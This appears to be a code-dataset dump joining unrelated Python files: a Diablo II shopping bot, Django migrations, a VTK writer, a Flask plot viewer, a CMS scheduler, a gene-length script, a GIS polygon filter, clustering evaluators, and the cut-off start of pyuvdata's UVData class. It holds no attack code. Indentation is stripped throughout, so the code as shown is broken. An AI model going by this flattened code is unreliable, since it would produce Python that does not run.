def run(self):
Logger.info("Personal Drognan Shopper at your service! Hang on, running some errands...")
self.reset_shop()
self.shop_loop()
def shop_loop(self):
# This is the main shopping loop. It can be further generalized to more easily support new items,
# But this is sufficient for now.
while True:
self.check_run_time()
trade_is_open = False
while not trade_is_open:
open_npc_menu(Npc.DROGNAN)
press_npc_btn(Npc.DROGNAN, "trade")
trade_is_open = self.is_trade_open()
time.sleep(0.1)
img = grab()
for search_tab in self.search_tabs:
self.click_tab(search_tab)
self.search_for_leaf_runeword_base()
self.search_for_wand_of_life_tap()
self.search_for_wand_of_lower_resist()
if self.look_for_scepters is True:
mouse.move(self.sb_x, self.sb_y, randomize=3, delay_factor=[0.6, 0.8])
wait(0.05, 0.1)
mouse.press(button="left")
wait(0.05, 0.1)
mouse.release(button="left")
wait(0.3, 0.4)
# Search for items
item_pos = []
img = grab().copy()
item_keys = ["SCEPTER1", "SCEPTER2", "SCEPTER3", "SCEPTER4", "SCEPTER5"]
for ck in item_keys:
template_match = TemplateFinder(True).search(ck, img, roi=self.roi_vendor)
if template_match.valid:
item_pos.append(template_match.center)
# check out each item
for pos in item_pos:
x_m, y_m = convert_screen_to_monitor(pos)
mouse.move(x_m, y_m, randomize=3, delay_factor=[0.5, 0.6])
wait(0.5, 0.6)
img_stats = grab()
# First check for +2 Paladin Skills. This weeds out most scepters right away.
if TemplateFinder(True).search("2_TO_PALADIN_SKILLS", img_stats, roi=self.roi_shop_item_stats, threshold=0.94).valid:
# Has 2 Pally skills, check blessed hammers next
if TemplateFinder(True).search("TO_BLESSED_HAMMERS", img_stats, roi=self.roi_shop_item_stats, threshold=0.9).valid:
# Has 2 Pally skills AND Blessed Hammers, check Concentration next
if TemplateFinder(True).search("TO_CONCENTRATION", img_stats, roi=self.roi_shop_item_stats, threshold=0.9).valid:
# Has 2 Pally skills AND Blessed Hammers AND Concentration. We're good! Buy it!
mouse.click(button="right")
Logger.info(f"Item bought!")
self.items_bought += 1
time.sleep(1)
self.items_evaluated += 1
keyboard.send("esc")
# Done with this shopping round
self.reset_shop()
self.run_count += 1
def reset_shop(self):
# We want to walk out the town exit to the top right and come back down to drognan
# This can probably be tweaked but seems to work well enough for now.
# Exit town
self.move_shopper(200, -100, 2.5)
self.move_shopper(-200, 100, 2)
def get_tabs(self):
"""
Sets up which tabs we want to search in
"""
if self.look_for_wand_of_life_tap or self.look_for_wand_of_lower_resist:
self.search_tabs.add(2)
if self.look_for_leaf_runeword_base:
self.search_tabs.add(2)
self.search_tabs.add(3)
| StarcoderdataPython |
1621732 | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('open_humans', '0015_auto_20150410_0042'),
]
operations = [
migrations.AlterModelManagers(
name='member',
managers=[
],
),
]
| StarcoderdataPython |
89599 | import sys
from numpy import *
nline = eval(sys.argv[1])
t = linspace(0., 1., nline)
x = eval(sys.argv[2])
y = eval(sys.argv[3])
f = open(sys.argv[4], 'w')
f.write('# vtk DataFile Version 4.2\n')
f.write('vtk output\n')
f.write('ASCII\n')
f.write('DATASET UNSTRUCTURED_GRID\n')
f.write('POINTS {} double\n'.format(nline))
for i in range(nline):
f.write('{} {} 0\n'.format(x[i], y[i]))
ncells = nline - 1
f.write('CELLS {} {}\n'.format(ncells, ncells*3))
for i in range(ncells):
f.write('2 {} {}\n'.format(i, i + 1))
f.write('CELL_TYPES {}\n'.format(ncells))
for i in range(ncells):
f.write('3\n')
f.close()
| StarcoderdataPython |
1628519 | <filename>labs_final/lab3/viskit/frontend.py<gh_stars>1-10
#!/usr/bin/env python
import os
import flask
from viskit import core
import sys
import argparse
import json
import numpy as np
import plotly.offline as po
import plotly.graph_objs as go
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def unique(l):
return list(set(l))
def flatten(l):
return [item for sublist in l for item in sublist]
def sliding_mean(data_array, window=5):
data_array = np.array(data_array)
new_list = []
for i in range(len(data_array)):
indices = list(range(max(i - window + 1, 0),
min(i + window + 1, len(data_array))))
avg = 0
for j in indices:
avg += data_array[j]
avg /= float(len(indices))
new_list.append(avg)
return np.array(new_list)
app = flask.Flask(__name__, static_url_path='/static')
exps_data = None
plottable_keys = None
x_plottable_keys = None
distinct_params = None
data_paths = None
@app.route('/js/<path:path>')
def send_js(path):
return flask.send_from_directory('js', path)
@app.route('/css/<path:path>')
def send_css(path):
return flask.send_from_directory('css', path)
def make_plot(plot_list, title=None):
data = []
for idx, plt in enumerate(plot_list):
color = core.color_defaults[idx % len(core.color_defaults)]
x = list(plt.xs)
if plt.display_mode in ["mean_std", "mean_se"]:
y = list(plt.means)
if plt.display_mode == "mean_std":
y_upper = list(plt.means + plt.stds)
y_lower = list(plt.means - plt.stds)
elif plt.display_mode == "mean_se":
y_upper = list(plt.means + plt.ses)
y_lower = list(plt.means - plt.ses)
else:
raise NotImplementedError
data.append(go.Scatter(
x=x + x[::-1],
y=y_upper + y_lower[::-1],
fill='tozerox',
fillcolor=core.hex_to_rgb(color, 0.2),
line=go.Line(color='transparent'),
showlegend=False,
legendgroup=plt.legend,
hoverinfo='none'
))
data.append(go.Scatter(
x=x,
y=y,
name=plt.legend,
legendgroup=plt.legend,
line=dict(color=core.hex_to_rgb(color)),
))
elif plt.display_mode == "individual":
for idx, y in enumerate(plt.ys):
data.append(go.Scatter(
x=x,
y=y,
name=plt.legend,
legendgroup=plt.legend,
line=dict(color=core.hex_to_rgb(color)),
showlegend=idx == 0,
))
else:
raise NotImplementedError
layout = go.Layout(
legend=dict(
x=1,
y=1,
),
title=title,
)
fig = go.Figure(data=data, layout=layout)
fig_div = po.plot(fig, output_type='div', include_plotlyjs=False)
if "footnote" in plot_list[0]:
footnote = "<br />".join([
r"<span><b>%s</b></span>: <span>%s</span>" % (
plt.legend, plt.footnote)
for plt in plot_list
])
return r"%s<div>%s</div>" % (fig_div, footnote)
else:
return fig_div
def summary_name(exp, selector=None):
return exp.params["exp_name"]
def check_nan(exp):
return all(not np.any(np.isnan(vals)) for vals in list(exp.progress.values()))
def get_plot_instruction(
x_plot_key,
plot_key,
display_mode,
split_key=None,
group_key=None,
filters=None,
):
# print(x_plot_key, plot_key, split_key, group_key, filters)
# if x_plot_key != "(default)":
# group_key = None
selector = core.Selector(exps_data)
if filters is None:
filters = dict()
for k, v in filters.items():
selector = selector.where(k, str(v))
if split_key is not None:
vs = [vs for k, vs in distinct_params if k == split_key][0]
split_selectors = [selector.where(split_key, v) for v in vs]
split_legends = list(map(str, vs))
else:
split_selectors = [selector]
split_legends = ["Plot"]
plots = []
counter = 1
for split_selector, split_legend in zip(split_selectors, split_legends):
if group_key and group_key is not "exp_name":
vs = [vs for k, vs in distinct_params if k == group_key][0]
group_selectors = [split_selector.where(group_key, v) for v in vs]
group_legends = [str(x) for x in vs]
else:
group_key = "exp_name"
vs = sorted([x.params["exp_name"]
for x in split_selector.extract()])
group_selectors = [split_selector.where(group_key, v) for v in vs]
group_legends = [summary_name(
x.extract()[0], split_selector) for x in group_selectors]
to_plot = []
for group_selector, group_legend in zip(group_selectors, group_legends):
filtered_data = group_selector.extract()
if len(filtered_data) > 0:
progresses = [
exp.progress.get(plot_key, np.array([np.nan])) for exp in filtered_data]
sizes = list(map(len, progresses))
# more intelligent:
max_size = max(sizes)
progresses = [
np.concatenate([ps, np.ones(max_size - len(ps)) * np.nan]) for ps in progresses
]
if x_plot_key == "(default)":
xs = np.arange(max_size)
else:
# first decide what the xs should be
# ideally, it should be the union of
all_xs = np.unique(np.sort(np.concatenate(
[d.progress.get(x_plot_key, []) for d in filtered_data])))
interp_progresses = []
for d in filtered_data:
if x_plot_key in d.progress:
assert plot_key in d.progress
interp_progresses.append(
np.interp(
all_xs,
d.progress[x_plot_key],
d.progress[plot_key],
right=np.nan
)
)
else:
continue
progresses = interp_progresses
xs = all_xs
if display_mode == "mean_std":
means = np.nanmean(progresses, axis=0)
stds = np.nanstd(progresses, axis=0)
to_plot.append(AttrDict(
means=means,
stds=stds,
legend=group_legend,
xs=xs,
display_mode=display_mode,
))
elif display_mode == "mean_se":
means = np.nanmean(progresses, axis=0)
ses = np.nanstd(progresses, axis=0) / \
np.sqrt(np.sum(1 - np.isnan(progresses), axis=0))
to_plot.append(AttrDict(
means=means,
ses=ses,
legend=group_legend,
xs=xs,
display_mode=display_mode,
))
elif display_mode == "individual":
to_plot.append(AttrDict(
xs=xs,
ys=progresses,
legend=group_legend,
display_mode=display_mode,
))
else:
raise NotImplementedError
if len(to_plot) > 0:
fig_title = "%s: %s" % (split_key, split_legend)
plots.append(make_plot(
to_plot,
title=fig_title,
))
counter += 1
return "\n".join(plots)
def parse_float_arg(args, key):
x = args.get(key, "")
try:
return float(x)
except Exception:
return None
@app.route("/plot_div")
def plot_div():
args = flask.request.args
reload_s3 = args.get("reload_s3", False)
x_plot_key = args.get("x_plot_key", "(default)")
plot_key = args.get("plot_key")
display_mode = args.get("display_mode", "mean_std")
split_key = args.get("split_key", "")
group_key = args.get("group_key", "")
filters_json = args.get("filters", "{}")
filters = json.loads(filters_json)
if len(split_key) == 0:
split_key = None
if len(group_key) == 0:
group_key = None
print(reload_s3, type(reload_s3))
if reload_s3:
project_root = os.path.abspath(
os.path.join(os.path.dirname(__file__), ".."))
print(data_paths)
for data_path in data_paths:
if "data/s3/" in data_path:
exp_group = data_path.split("data/s3/")[-1].split("/")[0]
os.system("python %s/scripts/sync_s3.py %s" %
(project_root, exp_group))
reload_data()
plot_div = get_plot_instruction(
x_plot_key=x_plot_key,
plot_key=plot_key,
display_mode=display_mode,
split_key=split_key,
group_key=group_key,
filters=filters,
)
return plot_div
@app.route("/")
def index():
if "AverageReturn" in plottable_keys:
plot_key = "AverageReturn"
elif len(plottable_keys) > 0:
plot_key = plottable_keys[0]
else:
plot_key = None
if len(distinct_params) > 0:
group_key = distinct_params[0][0]
else:
group_key = None
print("Getting plot instruction...")
plot_div = get_plot_instruction(
x_plot_key="(default)", plot_key=plot_key, display_mode="mean_std", split_key=None, group_key=group_key)
print("Rendering...")
rendered = flask.render_template(
"main.html",
plot_div=plot_div,
plot_key=plot_key,
group_key=group_key,
plottable_keys=plottable_keys,
x_plot_key="(default)",
x_plottable_keys=["(default)"] + x_plottable_keys,
distinct_param_keys=[str(k) for k, v in distinct_params],
distinct_params=dict([(str(k), list(map(str, v)))
for k, v in distinct_params]),
)
return rendered
def is_increasing_key(key, exps_data):
for exp in exps_data:
if key in exp.progress and not is_increasing(exp.progress[key]):
return False
return True
def is_increasing(arr):
return np.all(arr[1:] - arr[:-1] >= 0) and np.max(arr) > np.min(arr)
def reload_data():
global exps_data
global plottable_keys
global distinct_params
global x_plottable_keys
exps_data = core.load_exps_data(data_paths)
plottable_keys = sorted(list(
set(flatten(list(exp.progress.keys()) for exp in exps_data))))
distinct_params = sorted(core.extract_distinct_params(exps_data))
x_plottable_keys = [
key for key in plottable_keys if is_increasing_key(key, exps_data)]
if __name__ == "__main__":
default_port = int(os.environ.get("VISKIT_PORT", 5000))
parser = argparse.ArgumentParser()
parser.add_argument("data_paths", type=str, nargs='*')
parser.add_argument("--debug", action="store_true", default=False)
parser.add_argument("--port", type=int, default=default_port)
args = parser.parse_args(sys.argv[1:])
data_paths = args.data_paths
print("Importing data from {path}...".format(path=args.data_paths))
reload_data()
url = "http://localhost:%d" % (args.port)
print("Done! View %s in your browser" % (url))
app.run(host='0.0.0.0', port=args.port, debug=args.debug, threaded=True)
| StarcoderdataPython |
3395439 | #!/usr/bin/env python3
# TODO: add cmdline options to suppress emailed reports
if __name__ == '__main__':
if __package__ is None:
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import settings
from core.models.transaction import transaction
from core.cms.queue import process_queue
opts = set()
if len(sys.argv) > 1:
for n in range(1, len(sys.argv)):
opts.add(sys.argv[n])
nowait = True if '--nowait' in opts else False
clear_job = True if '--clearjob' in opts else False
@transaction
def run(n):
return process_queue(n)
import datetime
product_id = '{}, running in {}'.format(settings.PRODUCT_NAME, settings.APPLICATION_PATH)
print ('{}\nScheduled tasks script.'.format(product_id))
if nowait:
print('Ignoring insert wait.')
print ('Looking for scheduled tasks...')
from core.models import Page, page_status, Queue
blogs_to_check = {}
scheduled_page_report = []
scheduled_pages = Page.select().where(
Page.status == page_status.scheduled,
Page.publication_date <= datetime.datetime.utcnow()).order_by(
Page.publication_date.desc())
total_pages = scheduled_pages.count()
print ('{} pages scheduled'.format(total_pages))
if total_pages > 0:
for p in scheduled_pages.select(Page.blog).distinct():
b = p.blog
blogs_to_check[b.id] = b
queue_count = Queue.select(Queue.blog).distinct()
if queue_count.count() > 0:
for n in queue_count:
b = n.blog
print ('Blog {} has existing queue items'.format(b.id))
blogs_to_check[b.id] = b
if blogs_to_check:
print ("Starting run.")
from core.cms.queue import (queue_page_actions, queue_index_actions,
queue_ssi_actions)
from core.models import db
from core.log import logger
from time import sleep
for b in blogs_to_check:
try:
n = blogs_to_check[b]
skip = None
if clear_job:
Queue.stop(n)
if nowait is False and Queue.is_insert_active(n):
skip = 'Insert in progress for blog {}. Skipping this run.'.format(n.id)
elif Queue.control_jobs(n).count() > 0:
skip = 'Job already running for blog {}. Skipping this run.'.format(n.id)
if skip:
print (skip)
scheduled_page_report.append(skip)
continue
for p in scheduled_pages.where(Page.blog == b).distinct():
scheduled_page_report.append('Scheduled pages:')
try:
with db.atomic() as txn:
scheduled_page_report.append('{} -- on {}'.format(p.title, p.publication_date))
p.status = page_status.published
p.save(p.user, no_revision=True)
queue_page_actions((p,))
blogs_to_check[p.blog.id] = p.blog
except Exception as e:
problem = 'Problem with page {}: {}'.format(n.title, e)
print (problem)
scheduled_page_report.append(problem)
queue_index_actions(n)
queue_ssi_actions(n)
waiting = Queue.job_counts(blog=n)
waiting_report = '{} jobs waiting for blog {}'.format(waiting, n.id)
print (waiting_report)
scheduled_page_report.append(waiting_report)
Queue.start(n)
print ("Processing {} jobs for blog '{}'.".format(
waiting, n.name))
from time import clock
begin = clock()
passes = 1
while 1:
sleep(.1)
remaining = run(n)
print ("Pass {}: {} jobs remaining.".format(passes, remaining))
if remaining == 0:
break
passes += 1
end = clock()
total_time = end - begin
time_elapsed = "Total elapsed time: {} seconds".format(int(total_time))
print (time_elapsed)
scheduled_page_report.append(time_elapsed)
except Exception as e:
problem = 'Problem with blog {}: {}'.format(b, e)
print (problem)
scheduled_page_report.append(problem)
if scheduled_page_report:
message_text = '''
This is a scheduled-tasks report from the installation of {}.
{}
'''.format(product_id,
'\n'.join(scheduled_page_report))
import smtplib
from email.mime.text import MIMEText
from core.auth import get_users_with_permission, role
admin_users = get_users_with_permission(role.SYS_ADMIN)
admins = []
for n in admin_users:
msg = MIMEText(message_text)
msg['Subject'] = 'Scheduled activity report for {}'.format(product_id)
msg['From'] = n.email
msg['To'] = n.email
admins.append(n.email)
s = smtplib.SMTP('localhost')
s.send_message(msg)
s.quit()
print ('Reports emailed to {}.'.format(','.join(admins)))
logger.info("Scheduled job run, processed {} pages.".format(total_pages))
else:
print ('No scheduled tasks found to run.')
print ('Scheduled tasks script completed.')
| StarcoderdataPython |
3369985 | <filename>bot/plugins/wideoidea.py<gh_stars>0
from __future__ import annotations
import os
import tempfile
from bot.config import Config
from bot.data import command
from bot.data import format_msg
from bot.message import Message
from bot.util import check_call
@command('!wideoidea', '!videoidea', secret=True)
async def cmd_videoidea(config: Config, msg: Message) -> str:
if not msg.is_moderator and msg.name_key != config.channel:
return format_msg(msg, 'https://youtu.be/RfiQYRn7fBg')
_, _, rest = msg.msg.partition(' ')
async def _git(*cmd: str) -> None:
await check_call('git', '-C', tmpdir, *cmd)
with tempfile.TemporaryDirectory() as tmpdir:
await _git(
'clone', '--depth=1', '--quiet',
'<EMAIL>:asottile/scratch.wiki', '.',
)
ideas_file = os.path.join(tmpdir, 'anthony-explains-ideas.md')
with open(ideas_file, 'rb+') as f:
f.seek(-1, os.SEEK_END)
c = f.read()
if c != b'\n':
f.write(b'\n')
f.write(f'- {rest}\n'.encode())
await _git('add', '.')
await _git('commit', '-q', '-m', 'idea added by !videoidea')
await _git('push', '-q', 'origin', 'HEAD')
return format_msg(
msg,
'added! https://github.com/asottile/scratch/wiki/anthony-explains-ideas', # noqa: E501
)
| StarcoderdataPython |
90728 | #!/usr/bin/env python
# encoding: utf-8
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import os, sys, re
import logging
import argparse
import collections
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
logger = logging.getLogger(__file__)
def main():
parser = argparse.ArgumentParser(description="estimates gene length as isoform lengths weighted by TPM expression values")
parser.add_argument("--gene_trans_map", dest="gene_trans_map_file", type=str, default="",
required=True, help="gene-to-transcript mapping file, format: gene_id(tab)transcript_id")
parser.add_argument("--trans_lengths", dest="trans_lengths_file", type=str, required=True,
help="transcript length file, format: trans_id(tab)length")
parser.add_argument("--TPM_matrix", dest="TPM_matrix_file", type=str, default="",
required=True, help="TPM expression matrix")
parser.add_argument("--debug", required=False, action="store_true", default=False, help="debug mode")
args = parser.parse_args()
if args.debug:
logger.setLevel(logging.DEBUG)
trans_to_gene_id_dict = parse_gene_trans_map(args.gene_trans_map_file)
trans_lengths_dict = parse_trans_lengths_file(args.trans_lengths_file)
trans_to_TPM_vals_dict = parse_TPM_matrix(args.TPM_matrix_file)
weighted_gene_lengths = compute_weighted_gene_lengths(trans_to_gene_id_dict,
trans_lengths_dict,
trans_to_TPM_vals_dict)
print("#gene_id\tlength")
for gene_id,length in weighted_gene_lengths.items():
print("\t".join([gene_id,str(length)]))
sys.exit(0)
def compute_weighted_gene_lengths(trans_to_gene_id_dict, trans_lengths_dict, trans_to_TPM_vals_dict):
gene_id_to_trans_list = collections.defaultdict(list)
gene_id_to_length = {}
pseudocount = 1
for trans_id,gene_id in trans_to_gene_id_dict.items():
gene_id_to_trans_list[gene_id].append(trans_id)
for gene_id,trans_list in gene_id_to_trans_list.items():
if len(trans_list) == 1:
gene_id_to_length[gene_id] = trans_lengths_dict[ trans_list[0] ]
else:
sum_length_x_expr = 0
sum_expr = 0
trans_expr_lengths = []
for trans_id in trans_list:
trans_len = trans_lengths_dict[trans_id]
expr_vals = trans_to_TPM_vals_dict[trans_id]
trans_sum_expr = sum(expr_vals) + pseudocount
trans_expr_lengths.append((trans_len, trans_sum_expr))
sum_length_x_expr += trans_sum_expr * trans_len
sum_expr += trans_sum_expr
weighted_gene_length = sum_length_x_expr / sum_expr
gene_id_to_length[gene_id] = int(round(weighted_gene_length))
logger.debug("Computing weighted length of {}: {} => {}".format(gene_id,
trans_expr_lengths,
weighted_gene_length))
return gene_id_to_length
def parse_TPM_matrix(TPM_matrix_file):
trans_to_TPM_vals_dict = {}
with open(TPM_matrix_file) as f:
header = f.next()
for line in f:
line = line.rstrip()
vals = line.split("\t")
trans_id = vals[0]
expr_vals_list = vals[1:]
expr_vals_list = [float(x) for x in expr_vals_list]
trans_to_TPM_vals_dict[trans_id] = expr_vals_list
return trans_to_TPM_vals_dict
def parse_trans_lengths_file(trans_lengths_file):
trans_id_to_length = {}
with open(trans_lengths_file) as f:
for line in f:
line = line.rstrip()
if line[0] == '#':
continue
(trans_id, length) = line.split("\t")
trans_id_to_length[trans_id] = int(length)
return trans_id_to_length
def parse_gene_trans_map(gene_trans_map_file):
trans_to_gene_id = {}
with open(gene_trans_map_file) as f:
for line in f:
line = line.rstrip()
(gene_id, trans_id) = line.split("\t")
trans_to_gene_id[trans_id] = gene_id;
return trans_to_gene_id
####################
if __name__ == "__main__":
main()
| StarcoderdataPython |
112924 | <filename>resultScript/remove_polygons.py
#!/usr/bin/env python
# Filename: remove_polygons.py
"""
introduction: keep the true positive only, i.e., remove polygons with IOU less than or equal to 0.5.
it can also be used to remove other polygons based on an attribute
authors: <NAME>
email:<EMAIL>
add time: 26 February, 2019
"""
import os,sys
from optparse import OptionParser
HOME = os.path.expanduser('~')
# path of DeeplabforRS
codes_dir2 = HOME + '/codes/PycharmProjects/DeeplabforRS'
sys.path.insert(0, codes_dir2)
import basic_src.io_function as io_function
import basic_src.basic as basic
import vector_features
from vector_features import shape_opeation
def check_same_projection(shp_file, file2):
'''
check the projection of shape file and the raster file
:param shp_file:
:param raster_file:
:return:
'''
shp_args_list = ['gdalsrsinfo','-o','epsg',shp_file]
shp_epsg_str = basic.exec_command_args_list_one_string(shp_args_list)
raster_args_list = ['gdalsrsinfo','-o','epsg',file2]
raster_epsg_str = basic.exec_command_args_list_one_string(raster_args_list)
if shp_epsg_str == raster_epsg_str:
return True
else:
return False
def remove_polygons(shapefile,field_name, threshold, bsmaller,output):
# remove the not narrow polygon based on ratio_p_a
operation_obj = shape_opeation()
if operation_obj.remove_shape_baseon_field_value(shapefile, output, field_name, threshold, smaller=bsmaller) is False:
return False
def remove_lines_based_on_polygons(shp_line,output_mainline,shp_polygon):
'''
if lines if they don't overlap any polygons
:param shp_line:
:param output_mainline:
:param shp_polygon:
:return:
'''
if check_same_projection(shp_line,shp_polygon) is False:
raise ValueError('%s and %s don\'t have the same projection')
print(shp_line,shp_polygon)
inte_lines_list = vector_features.get_intersection_of_line_polygon(shp_line,shp_polygon)
b_remove = [True if item.is_empty else False for item in inte_lines_list ]
# print(b_remove)
# a=0
# b=0
# for rm in b_remove:
# if rm is True:
# a += 1
# else:
# b += 1
# print(a,b)
#note that, after remove, the number of main lines are greater than the number of polygons in "shp_polygon"
#This is because, in Beiluhe, some mapped thaw slumps close to each other were merged to one
operation_obj = shape_opeation()
if operation_obj.remove_shapes_by_list(shp_line,output_mainline,b_remove) is False:
return False
def remove_polygons_intersect_multi_ground_truths(shp_file, shp_ground_truth, output, copy_fields=None):
'''
:param shp_file:
:param shp_ground_truth:
:param output:
:param copy_fields:
:return:
'''
operation_obj = shape_opeation()
return operation_obj.remove_polygons_intersect_multi_polygons(shp_file, shp_ground_truth, output, copy_fields=copy_fields)
def main(options, args):
polygons_shp = args[0]
field_name = options.field_name
threshold = options.threshold
bsmaller = options.bsmaller # if true, then remove the bsmaller ones
output = options.output
# print(field_name,threshold,bsmaller,output)
if field_name is not None:
remove_polygons(polygons_shp, field_name, threshold, bsmaller, output)
# remove the file in main_lines
shp_mainline = options.shp_mainline
if shp_mainline is not None:
output_mainline = options.output_mainline
remove_lines_based_on_polygons(shp_mainline, output_mainline, output)
# remove polygon based on the intersection with ground truth polygons
val_polygon = options.val_polygon
if val_polygon is not None:
copy_fields = options.copy_fields
copy_fields = copy_fields.split(',')
remove_polygons_intersect_multi_ground_truths(polygons_shp, val_polygon, output, copy_fields=copy_fields)
if __name__ == "__main__":
usage = "usage: %prog [options] shp_file"
parser = OptionParser(usage=usage, version="1.0 2019-1-4")
parser.description = 'Introduction: remove polygons based on an attributes values'
parser.add_option("-o", "--output",
action="store", dest="output",default='save_polygon.shp',
help="save file path")
parser.add_option("-f", "--field_name",
action="store", dest="field_name",
help="the field name of the attribute based on which to remove polygons")
parser.add_option("-t", "--threshold",
action="store", dest="threshold", default=0.5,type=float,
help="the threshold to remove polygons")
parser.add_option("-l", "--mainline",
action="store", dest="shp_mainline",
help="the shape file store the main_Line of polygons")
parser.add_option("-m", "--output_mainline",
action="store", dest="output_mainline",default='save_mainline.shp',
help="save file path of main line")
parser.add_option("-v", "--val_polygon",
action="store", dest="val_polygon",
help="the path of validation polygons")
parser.add_option("-c", "--copy_fields",
action="store", dest="copy_fields",
help="the multi field names to be copied from validation polygons, e.g., 'area,perimeter', use comma to sperate them but no space")
parser.add_option("-s", "--bsmaller",
action="store_true", dest="bsmaller",
help="True will remove the bsmaller ones")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
sys.exit(2)
main(options, args) | StarcoderdataPython |
159174 | <reponame>django-doctor/lite-api
# Generated by Django 2.2.13 on 2020-06-16 08:37
from django.db import migrations, models
import django.utils.timezone
import model_utils.fields
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
("licences", "0005_auto_20200616_0837"),
("organisations", "0008_auto_20200601_0814"),
]
operations = [
migrations.CreateModel(
name="OpenLicenceReturns",
fields=[
(
"created_at",
model_utils.fields.AutoCreatedField(
default=django.utils.timezone.now, editable=False, verbose_name="created_at"
),
),
("id", models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
("returns_data", models.TextField()),
("year", models.PositiveSmallIntegerField()),
("licences", models.ManyToManyField(related_name="open_licence_returns", to="licences.Licence")),
(
"organisation",
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to="organisations.Organisation"),
),
],
options={"abstract": False,},
),
]
| StarcoderdataPython |
1766760 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
class TestRailBaseError(Exception):
def __str__(self):
return "[TestRailAPI] %s || (%s) || %s" \
% (self.status, self.reason, self.msg)
class TestRailAuthError(TestRailBaseError):
def __init__(self, status_code, reason):
self.status = status_code
self.reason = reason
self.msg = dict()
class TesRailAPIError(TestRailBaseError):
def __init__(self, res):
self.status = res.status_code
self.reason = res.reason
self.msg = res.content
| StarcoderdataPython |
3391157 | from abc import ABC, abstractmethod
from typing import Dict, Sequence, Generic, TypeVar
from .eval_stats.eval_stats_clustering import ClusteringUnsupervisedEvalStats, \
ClusteringSupervisedEvalStats, ClusterLabelsEvalStats
from .evaluator import MetricsDictProvider
from ..clustering import EuclideanClusterer
from ..util.profiling import timed
TClusteringEvalStats = TypeVar("TClusteringEvalStats", bound=ClusterLabelsEvalStats)
class ClusteringModelEvaluator(MetricsDictProvider, Generic[TClusteringEvalStats], ABC):
@timed
def _computeMetrics(self, model: EuclideanClusterer, **kwargs) -> Dict[str, float]:
"""
Evaluate the model and return the results as dict
:param model:
:param kwargs: will be passed to evalModel
:return:
"""
evalStats = self.evalModel(model, **kwargs)
return evalStats.getAll()
@abstractmethod
def evalModel(self, model: EuclideanClusterer, **kwargs) -> TClusteringEvalStats:
pass
class ClusteringModelUnsupervisedEvaluator(ClusteringModelEvaluator[ClusteringUnsupervisedEvalStats]):
def __init__(self, datapoints):
self.datapoints = datapoints
def evalModel(self, model: EuclideanClusterer, fit=True):
"""
Retrieve evaluation statistics holder for the clustering model
:param model:
:param fit: whether to fit on the evaluator's data before retrieving statistics.
Set this to False if the model you wish to evaluate was already fitted on the desired dataset
:return: instance of ClusteringUnsupervisedEvalStats that can be used for calculating various evaluation metrics
"""
if fit:
model.fit(self.datapoints)
return ClusteringUnsupervisedEvalStats.fromModel(model)
class ClusteringModelSupervisedEvaluator(ClusteringModelEvaluator[ClusteringSupervisedEvalStats]):
def __init__(self, datapoints, trueLabels: Sequence[int], noiseLabel=-1):
"""
:param datapoints:
:param trueLabels: labels of the true clusters, including the noise clusters.
:param noiseLabel: label of the noise cluster (if there is one) in the true labels
"""
if len(trueLabels) != len(datapoints):
raise ValueError("true labels must be of same length as datapoints")
self.datapoints = datapoints
self.trueLabels = trueLabels
self.noiseLabel = noiseLabel
def evalModel(self, model: EuclideanClusterer, fit=True):
"""
Retrieve evaluation statistics holder for the clustering model
:param model:
:param fit: whether to fit on the evaluator's data before retrieving statistics.
Set this to False if the model you wish to evaluate was already fitted on the desired dataset
:return: instance of ClusteringSupervisedEvalStats that can be used for calculating various evaluation metrics
"""
if fit:
model.noiseLabel = self.noiseLabel
model.fit(self.datapoints)
else:
if model.noiseLabel != self.noiseLabel:
raise ValueError(f"Noise label of evaluator does not match noise label of the model:"
f" {self.noiseLabel} != {model.noiseLabel}. "
f"Either evaluate with fit=True or adjust the noise label in the ground truth labels")
return ClusteringSupervisedEvalStats.fromModel(model, self.trueLabels)
| StarcoderdataPython |
1630408 | class Module3(object):
pass | StarcoderdataPython |
175315 | <reponame>aryanshridhar/Ecommerce-Website<gh_stars>1-10
from django.db import models
from django.contrib.auth.models import User
import os
class Profile(models.Model):
user = models.OneToOneField(User , on_delete = models.CASCADE)
image = models.ImageField(default='default.jpg' , upload_to='Ecommerce/images')
def __str__(self):
return self.user.username
def filename(self):
return os.path.basename(self.image.name)
| StarcoderdataPython |
35674 | <reponame>e-koch/pyuvdata
# -*- mode: python; coding: utf-8 -*-
# Copyright (c) 2018 Radio Astronomy Software Group
# Licensed under the 2-clause BSD License
"""Primary container for radio interferometer datasets."""
import os
import copy
from collections.abc import Iterable
import warnings
import threading
import numpy as np
from scipy import ndimage as nd
from astropy import constants as const
import astropy.units as units
from astropy.time import Time
from astropy.coordinates import SkyCoord, EarthLocation, FK5, Angle
from astropy import coordinates as coord
from ..uvbase import UVBase
from .. import parameter as uvp
from .. import telescopes as uvtel
from .. import utils as uvutils
__all__ = ["UVData"]
class UVData(UVBase):
"""
A class for defining a radio interferometer dataset.
Currently supported file types: uvfits, miriad, fhd.
Provides phasing functions.
Attributes
----------
UVParameter objects :
For full list see UVData Parameters
(http://pyuvdata.readthedocs.io/en/latest/uvdata_parameters.html).
Some are always required, some are required for certain phase_types
and others are always optional.
"""
def __init__(self):
"""Create a new UVData object."""
# add the UVParameters to the class
# standard angle tolerance: 1 mas in radians.
radian_tol = 1 * 2 * np.pi * 1e-3 / (60.0 * 60.0 * 360.0)
self._Ntimes = uvp.UVParameter(
"Ntimes", description="Number of times", expected_type=int
)
self._Nbls = uvp.UVParameter(
"Nbls", description="Number of baselines", expected_type=int
)
self._Nblts = uvp.UVParameter(
"Nblts",
description="Number of baseline-times "
"(i.e. number of spectra). Not necessarily "
"equal to Nbls * Ntimes",
expected_type=int,
)
self._Nfreqs = uvp.UVParameter(
"Nfreqs", description="Number of frequency channels", expected_type=int
)
self._Npols = uvp.UVParameter(
"Npols", description="Number of polarizations", expected_type=int
)
desc = (
"Array of the visibility data, shape: (Nblts, 1, Nfreqs, "
